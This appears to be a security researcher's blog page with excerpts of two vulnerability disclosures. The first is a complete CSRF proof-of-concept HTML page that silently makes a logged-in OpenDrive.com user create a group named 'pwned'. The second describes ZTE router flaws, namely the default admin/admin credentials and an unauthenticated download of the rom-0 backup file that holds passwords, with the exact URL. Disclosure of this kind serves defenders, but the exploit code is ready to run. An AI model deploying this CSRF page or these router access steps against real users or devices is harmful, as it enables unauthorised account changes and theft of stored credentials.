Pwning OpenDrive Users

After a long time being away from bug hunting I randomly found these few bugs in the OpenDrive.com website.

If the attacker can run this code while the user is logged in he can create his own Groups in the users section. This is the proof of concept and you will see groups such as “pwned” being created.

XSRF in Creating Groups

View post on imgur.com

[code language=”html”]
<html>
<!– Discovered by @OsandaMalith–>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://www.opendrive.com/ajax", true);
xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
xhr.withCredentials = true;
var body = "action=create-usergroup&group_name=pwned&group_max_storage=5120&group_bw_max=1024";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Click Here to Pwn" onclick="submitRequest();" />
</form>
</body>
</html>
[/code]
(more…)

ZTE WXV10 W300 Multiple Vulnerabilities

Default Password Being Used (CVE-2014-4018)

In ZTE routers the username is a constant which is “admin” and the password by default is “admin”

ROM-0 Backup File Disclosure (CVE-2014-4019)

There is a rom-0 backup file contains sensitive information such as the passwords. There is a disclosure in which anyone can download that file without any authentication by a simple GET request.

http://192.168.1.1/rom-0 (more…)